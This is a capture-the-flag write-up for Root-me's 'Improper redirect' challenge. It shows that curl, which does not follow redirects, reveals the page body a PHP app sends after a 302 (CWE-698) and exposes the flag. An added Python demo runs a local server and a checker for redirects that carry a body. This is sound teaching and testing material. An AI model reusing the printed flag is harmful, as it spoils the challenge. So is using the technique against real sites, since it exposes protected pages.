Root-me

Improper redirect

Don’t trust your browser

We need to get access to index, whatever that means.

We’re greeted by a login page. The funny thing about this challenge is that I like to use the curl command to look at the page. Since curl does not follow redirects by default, we’re led directly to the flag.

curl http://challenge01.root-me.org/web-serveur/ch32/

<html>
<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
<h1>Welcome !</h1>

<p>Yeah ! The redirection is OK, but without exit() after the header('Location: ...'), PHP just continue the execution and send the page content !...</p>
<p><a href="http://cwe.mitre.org/data/definitions/698.html">CWE-698: Execution After Redirect (EAR)</a></p>
<p>The flag is : ExecutionAfterRedirectIsBad</p>
</body>
</html>

If we look at the headers of that page, we’ll see that the status code is a 302 that redirects to the login page we saw earlier when we clicked on the challenge button.

curl -I http://challenge01.root-me.org/web-serveur/ch32/

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 11 Nov 2017 02:21:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Location: ./login.php?redirect

So yeah, use curl!
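
An added example (not part of the original write-up, and not the challenge's PHP code): a Python stand-in server reproduces the 302-with-body behaviour next to a handler that stops after the redirect, and a check that does not follow redirects flags the difference. The paths /ear and /fixed, the Handler class and the sample body are constructed for illustration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample content standing in for the protected page.
SECRET = b"<h1>Welcome !</h1><p>members-only content (constructed)</p>"

class Handler(BaseHTTPRequestHandler):
    """Constructed stand-in for the PHP page; every request is unauthenticated."""

    def do_GET(self):
        # /ear:   redirect headers are sent, then the page body anyway
        #         (the effect of a missing exit() after header('Location: ...')).
        # /fixed: the handler stops right after the redirect headers.
        body = SECRET if self.path == "/ear" else b""
        self.send_response(302)
        self.send_header("Location", "./login.php?redirect")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass

def check_redirect_body(host, port, path, max_body=0):
    """Fetch path without following redirects; flag a 3xx that carries a body."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    is_redirect = 300 <= resp.status < 400
    return {"status": resp.status, "location": resp.getheader("Location"),
            "body_len": len(body),
            "suspect": is_redirect and len(body) > max_body}

def run_demo():
    """Start the stand-in server on a free loopback port and check both paths."""
    server = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        port = server.server_address[1]
        return {p: check_redirect_body("127.0.0.1", port, p)
                for p in ("/ear", "/fixed")}
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    for path, result in run_demo().items():
        print(path, result)
```

Raise max_body when checking real applications, since some servers attach a short HTML stub to legitimate redirects.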